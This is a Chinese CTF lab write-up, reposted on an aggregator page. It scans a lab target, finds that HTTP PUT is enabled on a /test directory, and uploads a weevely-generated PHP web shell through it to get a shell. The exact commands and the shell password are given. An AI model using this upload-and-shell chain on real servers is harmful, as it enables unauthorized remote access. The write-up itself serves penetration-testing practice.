微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

【CTF】PUT上传漏洞

kali:192.168.223.131
target:192.168.223.174

通过arp-scan -l获取目标IP为192.168.223.174,nmap扫描一下,只开放22和80端口,80端口只是一张图片

nmap -p- -A 192.168.223.174

image

nikto扫一下

nikto -h http://192.168.223.174

image

dirb同时扫描

dirb http://192.168.223.174

image

发现一个叫test的文件有点问题,但访问后看不出来,看一下当前HTTP允许什么

curl -v -X OPTIONS http://192.168.223.174/test

image

发现当前http允许使用PUT,使用火狐自带的工具Poster

image

进行如下操作,木马选择weevely生成的,下载到Windows

weevely generate 123456 shell.PHP
http://192.168.223.174/test/shell.PHP
Content Type:application/x-PHP
//文件选择之前weevely生成的shell.PHP文件

image

点击PUT,然后返回201状态码即表示成功,此时刷新test目录shell.PHP将跳出来

image

之后weevely连接即可拿到权限

weevely http://192.168.223.174/test/shell.PHP 123456
shell_sh

image

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。